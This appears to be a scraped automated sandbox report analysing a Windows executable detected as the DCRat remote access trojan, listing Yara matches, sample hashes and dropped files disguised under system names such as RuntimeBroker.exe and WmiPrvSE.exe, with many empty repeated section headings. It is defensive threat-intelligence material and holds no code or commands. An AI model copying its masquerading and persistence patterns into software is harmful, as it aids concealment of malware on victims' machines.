Source: Yara match	File source: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Windows Sidebar\RuntimeBroker.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 4.0.pfwa.exe.9a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000000.1637515390.0000000000B92000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1635034853.0000000004CE4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: work.exe PID: 7628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pfwa.exe PID: 7668, type: MEMORYSTR
Source: Yara match	File source: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\twain_32\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Windows Sidebar\RuntimeBroker.exe, type: DROPPED

Windows Analysis Report
JAJL2EYBPH.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1417078
Product:	CloudBasic
Start time:	15:31:05
Start date:	28.03.2024
Sample:	JAJL2EYBPH.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	0fa3cdb868bd4619a4146d8593bfff79
SHA1:	2dfa62bd92603d06d1735bedce6dffa7759b6692
SHA256:	124b0e5e84492c91ce2382751083691b7f3dda71546374289130f730e1349202
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Program Files\Common Files\Adobe\296c159f5c41a5	ASCII text, with very long lines (711), with no line terminators	2F0948A8ED171CD3B652D67555885092	FDDFBF98667361013C21BB8810C2ED49842B6C38	F00BFEE92F49CDD9B329FDEEF339B71066932DEF97F53663DCDBFC6E800B1A79
C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	9312C2AF306A8D0AAA3A73BA39CC8E63	7889E5A1506E498E9650EB1350B29A48BC886B61	1887BCEEAE6929BD7ADC33A749BFC1A67C39F538D65FDE108154CDCC9E6BFC04
C:\Program Files\Windows Sidebar\9e8d7a4ca61bd9	ASCII text, with very long lines (743), with no line terminators	C036B2628F2C5B5A33BDA30B8E924193	87A7E05E546AB827E2A2E27E801C5D9098EB8247	E1EE0401AC286D7860E314C1A43E16966CB39D8EC894B3665747EAEB236F0A4A
C:\Program Files\Windows Sidebar\RuntimeBroker.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	9312C2AF306A8D0AAA3A73BA39CC8E63	7889E5A1506E498E9650EB1350B29A48BC886B61	1887BCEEAE6929BD7ADC33A749BFC1A67C39F538D65FDE108154CDCC9E6BFC04
C:\Recovery\296c159f5c41a5	ASCII text, with very long lines (958), with no line terminators	00C34B96E2824080FA3E185BB93A0377	FD490A1EB7F81CCC3EE2F50B123397A42A840CB6	53233AB6A48D8D696CDE9477C9AB2649EE8B8D9475C1B096C1E3347CA19BEDB9
C:\Recovery\QmitaxvEcgoLLOqeIEyLx.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	9312C2AF306A8D0AAA3A73BA39CC8E63	7889E5A1506E498E9650EB1350B29A48BC886B61	1887BCEEAE6929BD7ADC33A749BFC1A67C39F538D65FDE108154CDCC9E6BFC04
C:\Users\Public\Music\296c159f5c41a5	ASCII text, with no line terminators	902A8AE8FFB5C6480AA67EE3AB70F232	85DA76ADA1BAD5B0754595F0FD6D4B14A4D126D2	0832A8A6CF6FB4C90CB340309D3679B9DE67361F278378490A0AF3F1B82FCDC8
C:\Users\Public\Music\QmitaxvEcgoLLOqeIEyLx.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	9312C2AF306A8D0AAA3A73BA39CC8E63	7889E5A1506E498E9650EB1350B29A48BC886B61	1887BCEEAE6929BD7ADC33A749BFC1A67C39F538D65FDE108154CDCC9E6BFC04
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WmiPrvSE.exe.log	CSV text	8DBD75DB1CDF35FB2A51BDCCB210F991	697736AFE49759C726D931E055F71D09982EEC0D	66901A6DA0851788F90080BFBED969F109DBFEB0A08958EA8DE3B98320EF9D26
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\pfwa.exe.log	CSV text	8DBD75DB1CDF35FB2A51BDCCB210F991	697736AFE49759C726D931E055F71D09982EEC0D	66901A6DA0851788F90080BFBED969F109DBFEB0A08958EA8DE3B98320EF9D26
C:\Users\user\AppData\Local\Temp\2ur4xek6Ec	ASCII text, with no line terminators	7A0668123B2E6D5DF76FFE6BC10A18E8	14CE7BB9DB27CC8698939DCBBDEDA320D51A2727	D89EEEC5267119347F6895C37106ABB49C6FFDC2D5D8BA5F200FD78C0AC53916
C:\Users\user\AppData\Local\Temp\31uZT8RR1g	ASCII text, with no line terminators	E5A3C30F7126DA667BECB1CDF6C50F6F	B923078A406AA8A14D530AE1F312008D94A0F662	1F787DA0FF8912E360D521FFC28BEBB3256B13C6966DEB648B54E222DA8A9D09
C:\Users\user\AppData\Local\Temp\3LXAY36iRv.bat	DOS batch file, ASCII text, with CRLF line terminators	50FED097231A347122B48F3A2BB3AC52	392F9B2CD93211CD818DCE49D03D6EFD0A4E1878	BA263B79C4EE707DC75857190D8458C15F8FFCE4E66C99469A47500CE6B362D6
C:\Users\user\AppData\Local\Temp\6cSt9rHHBK	ASCII text, with no line terminators	9FEF39B97047553CF902DAEEC40FB951	93B5E424317621F25BAB5E9D28142AA1E98C5BD4	8D7D39481AE83AD5292A219593FF02367A491BDE67049B906C60D2D703F9FC8B
C:\Users\user\AppData\Local\Temp\DQjzgbNPWC	ASCII text, with no line terminators	0DCF1822253CF965DF12175807702D6B	4ACDC167D59C6048B8A4D19CB3F5A7DD1EFB8601	066F71E0651983DC061F6940D8CAE596F48BBE5F51A3EA81B6BC469A89C27FBB
C:\Users\user\AppData\Local\Temp\K0WIhwgT8t	ASCII text, with no line terminators	3451A862A1CCD74417D7907CA7558E55	E0DF608A2CB825FF6183A74F89F3289E205F34A6	CBB9FBFC5A9CA679A4A19D2CB92263D8063CF2A3E053B820D3D20D0CF5F3F864
C:\Users\user\AppData\Local\Temp\NpnD5G3qEA.bat	DOS batch file, ASCII text, with CRLF line terminators	29DB91B7EFBB4A25CC4C8F2F628DE880	7574FFEE25AAAC4FB36E7C9341953903786ECC68	52805624714C639A99C76E4D8968EB8E734FE27C40B6560BCE90BD2D4951AAA1
C:\Users\user\AppData\Local\Temp\NqvJKoZOIs.bat	DOS batch file, ASCII text, with CRLF line terminators	36ED34215787998F678EAC00D80FF8BB	83567326804BCB0A2F66417EE79461B118937D42	0437C7B384A8BD6C8050363D648789DE530E5EC505265403228083F6652DD852
C:\Users\user\AppData\Local\Temp\PETuusIDIg	ASCII text, with no line terminators	A4B7F67F1B2F548A292ACAA8067F75E4	B991AE6852A2A15A8F9011E53F4E458FC2951267	071B168885EE735305F111F1E95BE1474A28CC854B6FDB91B1D309D82F7F1E1B
C:\Users\user\AppData\Local\Temp\PWyFBlMZQ5	ASCII text, with no line terminators	FDBCC5F5E8FB2F9F0582E34C1ED1FE31	160CE18435266DEE98F332E1EF11C73CD5022A27	B3C393E6E5B6D97FD2E588882FE4839685C2FC637DBC1AB9647F694038F40C72
C:\Users\user\AppData\Local\Temp\PgZvohdH9M	ASCII text, with no line terminators	BA67D49FA7BCCCB44B7428672E54A538	3A0509EB2CD54463912A7102188B6622AB697FFA	671D683F2F5F4954EA6FB60BDD74C1DB06DD5680958DF048275F47AC90E650C6
C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat	DOS batch file, ASCII text, with CRLF line terminators	FF59D999BEB970447667695CE3273F75	316FA09F467BA90AC34A054DAF2E92E6E2854FF8	065D2B17AD499587DC9DE7EE9ECDA4938B45DA1DF388BC72E6627DFF220F64D2
C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	PE32 executable (GUI) Intel 80386, for MS Windows	FE671F781E39EFCCD76DCBB16CC09678	8410FCC4124AFB45199972D0B0A39B567CF2216A	1B9A2608DE5A6109F13161D5C93DAC27CC9C6693444C96F6116870805731E88D
C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	9312C2AF306A8D0AAA3A73BA39CC8E63	7889E5A1506E498E9650EB1350B29A48BC886B61	1887BCEEAE6929BD7ADC33A749BFC1A67C39F538D65FDE108154CDCC9E6BFC04
C:\Users\user\AppData\Local\Temp\UO0HaVbJ1O.bat	DOS batch file, ASCII text, with CRLF line terminators	F692DA5AD05C0939727487B1C98BC40E	88C94BEEB3F8B65DF267E21574AC5D9C4621FAE7	159D02436D43783D331DFAAE9BEF60794D990C0E31A967E89F07C3F99B831C33
C:\Users\user\AppData\Local\Temp\Vs6Gb3dzjw.bat	DOS batch file, ASCII text, with CRLF line terminators	0B0F7A02A4A0A8095258E27E4B579356	6B8B6C4D039AD4D99E4272DD2D0D9671AC34D5AA	E6E6BF59020E725C5316EBA7CA11948339D971C5D8EE32B62BB95FDFC9E793DD
C:\Users\user\AppData\Local\Temp\ZXPLL9zJFP.bat	DOS batch file, ASCII text, with CRLF line terminators	B9FE9313D5B8A287A066493C85DC8DF6	4E7E2917039CF69269B59A01BE46091C7C0EF59A	9FC38AF616E235B5F8E5EB72FA0DE1833339E4ADDB65EFAA2CB86497ADB9A986
C:\Users\user\AppData\Local\Temp\aqdIlE7X6S	ASCII text, with no line terminators	54AA57490A39EDC50C2FB8D248B210DA	FBB7ED64C4CD7B36B28785181F85CFC2A87AB54D	8F6327B6975B1F4BBF963F8BF0FC007F45281D608AC6946E93792317A827E549
C:\Users\user\AppData\Local\Temp\diBg3fIzhe.bat	DOS batch file, ASCII text, with CRLF line terminators	DFAEA72642961524549A54236C205C19	5C48FD60CE95CE2B87D5E337731F155C14ABCA74	3DD23E573200B8368FB95E4727D818D70A9187F518776B066B7F049BB4017053
C:\Users\user\AppData\Local\Temp\g3J0tdP0ue.bat	DOS batch file, ASCII text, with CRLF line terminators	B526D23664DE2F1FB4863C0F9026C142	71779D693AD9AD9A8BD6E9EAFE97D9BC58629D3B	B3B310A44F8949FF23072EA122F3012036D834D7A6C6E7FF8D9AB1D2106ADB8E
C:\Users\user\AppData\Local\Temp\nBqbaEi3SG.bat	DOS batch file, ASCII text, with CRLF line terminators	392B9E9D04E1E8BCB96BE7ADE5020CEF	4C29BAB3B51C1F154D11473380D7A36EA9142D2D	011F24A6BE41244367E8E8424A641D6323EB1500E98608DA4705226A57CB31FD
C:\Users\user\AppData\Local\Temp\qhBWSYfEPb	ASCII text, with no line terminators	076A9BC583336B6BDEC1AA2D94436671	8277E43CC6F357C0CA8C6004DF9916BC4561BD83	9A50FA38B6387513DD979A41F7511CB199433B367EAC26289E849087812D7E0F
C:\Users\user\AppData\Local\Temp\rq9fLK5Nyj.bat	DOS batch file, ASCII text, with CRLF line terminators	D1B727BEC03769F1A07D7E5750008D6D	1B8EE732BE1CAE41DBE18990CE90DAA6FB39B438	537309E9EF2627F894A1863812C84162C03AC96587BEE696CD79780CC777127C
C:\Users\user\AppData\Local\Temp\s2ipVR9duq	ASCII text, with no line terminators	B02450CA11CA42576C6388ADC98EF193	236352BAA9D12D9ACA10431761DDCE417BE78293	CB9F679F5E71E1F22342A62E5E02A7E2E99E2F15C90AFD3BBBC0C2D00D684E7A
C:\Users\user\AppData\Local\Temp\v8evR6XBmk.bat	DOS batch file, ASCII text, with CRLF line terminators	E1AE732E45EC2B3C450949CA15390604	E386C00FDAD7EB9A16B1A674D28912F62F4C60C2	C8CD7F21A9454E24FC184CEAA89091EF87382B43542A798A1F3227D68F3CF279
C:\Users\user\AppData\Local\Temp\wlJdheforY	ASCII text, with no line terminators	5ECA1E7A07F4459F2A9EF48D9B26F00F	FE7E86DFE7F99F8528C17BD1B59381E694513185	EB90911AA2201AB9869212F381DBEEB126565443393E97C48C6E4319465D8BF1
C:\Users\user\AppData\Local\Temp\x3fbj0yJ9Y.bat	DOS batch file, ASCII text, with CRLF line terminators	9046AE0877513E8C32B916F1B8FE88BD	82FC329BDB4B0CDFDC3E039FC45D5FBDBA5577A9	62B3BB689176A486EAD2205B780DA85C3DBA96AD13ED6ECFD465F43676FBAA58
C:\Windows\twain_32\24dbde2999530e	ASCII text, with very long lines (837), with no line terminators	7F4B317D8EE2CE2FC4AB73A07FDD6BF6	F37DFEEF98FA15F12924FDD5A4020A0BBF77A617	F0A8BE5AEDABDA5EAEAC7D194A86BF70CFDDD19877E87788B1707C3BC180CB48
C:\Windows\twain_32\WmiPrvSE.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	9312C2AF306A8D0AAA3A73BA39CC8E63	7889E5A1506E498E9650EB1350B29A48BC886B61	1887BCEEAE6929BD7ADC33A749BFC1A67C39F538D65FDE108154CDCC9E6BFC04
\Device\Null	ASCII text	361FC1AD75819EEF7924D49949FBC360	19BA9D144485727B010FD431FCD35B43D3CBF89C	2E4E9333596D026DF4E22AE75C6C653E75DAAEA9C79DC74615675B9E9D3A3CEF

Windows Analysis Report JAJL2EYBPH.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
JAJL2EYBPH.exe

Malware Threat Intel
Provided by